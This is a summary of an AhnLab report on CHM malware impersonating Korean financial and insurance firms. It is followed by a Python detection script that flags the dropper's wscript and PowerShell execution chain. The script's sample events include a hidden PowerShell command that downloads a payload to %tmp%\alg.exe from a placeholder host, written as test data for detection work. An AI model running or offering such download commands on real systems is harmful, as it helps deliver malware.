CHM malware impersonating domestic financial companies and insurance companies

2023-07-20 AhnLab CHM malware impersonating domestic financial companies and insurance companies

https://asec.ahnlab.com/ko/55351/


ASEC describes CHM malware distributed in RAR archives that impersonates Korean financial firms and insurers, using decoy help-window content about card limits, insurance withdrawals, and bank contracts. When the CHM file is opened, its embedded script decompiles files to C:\Users\Public\Libraries, executes Docs.jse with wscript, and registers a Run-key entry for persistence. The script then launches PowerShell to download an additional payload to %tmp%\alg.exe from several attacker-controlled URLs; the payload servers were unreachable during analysis. AhnLab classifies the samples as Dropper/CHM.Generic and notes that the final payload could enable information theft or other follow-on activity, depending on what is retrieved.
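As an added defender-side example (not code from the ASEC report or this page), the following Python flags the execution chain summarised above in process-creation events: a script host running a script from C:\Users\Public\Libraries, and PowerShell spawned by that script host writing %tmp%\alg.exe. The pipe-separated event format, the sample events, the hh.exe parent process and the assumed shape of the Run-key value data are all constructed assumptions for the demo.

```python
import re

# Constructed process-creation events (not from the report), one per line,
# in the form "parent_image|image|command_line". hh.exe as the parent is an
# assumption about how the CHM is opened.
SAMPLE_EVENTS = [
    r"C:\Windows\hh.exe|C:\Windows\System32\wscript.exe|wscript.exe C:\Users\Public\Libraries\Docs.jse",
    r"C:\Windows\System32\wscript.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell -w hidden (New-Object Net.WebClient).DownloadFile('https://example.invalid/x','%tmp%\alg.exe')",
    r"C:\Windows\explorer.exe|C:\Windows\System32\wscript.exe|wscript.exe C:\Tools\inventory.js",
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell Get-Process",
]

# Script file launched from the public Libraries folder used by the dropper.
PUBLIC_LIBRARIES = re.compile(r"c:\\users\\public\\libraries\\[^ \"']+\.(jse|js|vbs|vbe)", re.I)
# Payload path used in the report: alg.exe under the user's temp directory.
TEMP_ALG = re.compile(r"(%tmp%|%temp%|\\temp\\)[\\/]*alg\.exe", re.I)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify_event(event: str) -> list[str]:
    """Return the rule names an event matches (empty list if benign)."""
    parent, image, cmdline = event.split("|", 2)
    findings = []
    if _basename(image) in SCRIPT_HOSTS and PUBLIC_LIBRARIES.search(cmdline):
        findings.append("script-host-public-libraries")
    if _basename(parent) in SCRIPT_HOSTS and _basename(image) == "powershell.exe":
        findings.append("powershell-from-script-host")
        if TEMP_ALG.search(cmdline):
            findings.append("download-to-tmp-alg-exe")
    return findings


def suspicious_run_value(value_data: str) -> bool:
    # Assumed shape of the persistence entry: the report only says a Run key
    # was used, so we flag any Run value whose data launches a script from
    # C:\Users\Public\Libraries.
    return bool(PUBLIC_LIBRARIES.search(value_data))


def scan(events: list[str]) -> dict[int, list[str]]:
    """Map event index -> matched rules, for events that matched anything."""
    return {i: f for i, f in ((i, classify_event(e)) for i, e in enumerate(events)) if f}


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, rules)
```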

Indicators of Compromise

